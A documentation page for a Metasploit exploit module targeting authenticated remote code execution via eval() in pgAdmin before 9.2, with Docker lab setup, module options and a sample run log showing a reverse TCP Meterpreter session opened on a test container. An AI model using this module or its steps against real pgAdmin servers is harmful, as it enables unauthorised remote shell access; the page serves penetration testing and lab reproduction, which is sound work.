adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3c37c20a8c49049477fc4fa8198d258ab3865740
metasploit-gs/documentation/modules/exploit/multi/http/pgadmin_query_tool_authenticated.md
T
Jack Heysel 4cec129e1c Responded to comments
2025-04-10 10:53:05 -07:00

3.1 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval() statement, resulting in remote code execution in versions prior to 9.2.

To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID, which is required for the exploit.

Setup

A pgAdmin Docker instance can be started using the following command:

docker run -d -p 8484:80 -e PGADMIN_DEFAULT_EMAIL=admin@admin.com -e PGADMIN_DEFAULT_PASSWORD=adminpassword --name pgadmin dpage/pgadmin4:9.0

A PostgreSQL database needs to be connected to the pgAdmin instance in order to exploit. The version of postgresql doesn't matter:

docker run -d -p 5432:5432 --name postgres -e POSTGRES_PASSWORD=mysecretpassword -e POSTGRES_USER=pgadminuser -e POSTGRES_DB=pgadmin postgres:latest

Verification Steps

  1. Start msfconsole.
  2. Do: use exploit/multi/http/pgadmin_query_tool_authenticated.
  3. Set the RHOST, USERNAME, PASSWORD, DB_USER, DB_PASS AND DB_NAME options.
  4. Run the module.
  5. Receive a Meterpreter session as the pgAdmin user.

Options

USERNAME

The username for authentication (required).

PASSWORD

The password for authentication (required).

DB_USER

The database username to authenticate to the database with (required).

DB_PASS

The password to authenticate to the database with (required).

DB_NAME

The name of the database to target (required)

MAX_SERVER_ID

The maximum number of Server IDs to try and connect to. This is used to determine the correct server ID for the exploit. A valid sid is required in order to connect to the query_tool in order to exploit. The default value is 10.

Scenarios

pgAdmin 4 v9.0

msf6 exploit(multi/http/pgadmin_query_tool_authenticated) > run db_name=postgres db_user=pgadminuser db_pass=mysecretpassword rhost=127.0.0.1 rport=8484 username=admin@admin.com password=adminpassword lhost=172.16.199.1 MAX_SERVER_ID=10 verbose=true
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 9.0.0 is affected
[+] Successfully authenticated to pgAdmin
[*] Trying server ID: 1
[*] Trying server ID: 2
[*] Trying server ID: 3
[+] Successfully initialized sqleditor
[*] Exploiting the target...
[*] Sending stage (24772 bytes) to 172.16.199.1
[+] Received a 500 response from the exploit attempt, this is expected
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.1:62455) at 2025-04-09 17:05:17 -0700

meterpreter > getuid
Server username: pgadmin
smeterpreter > sysinfo
Computer     : e9b855f7cda2
OS           : Linux 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Mar 20 16:36:58 UTC 2025
Architecture : x64
Meterpreter  : python/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink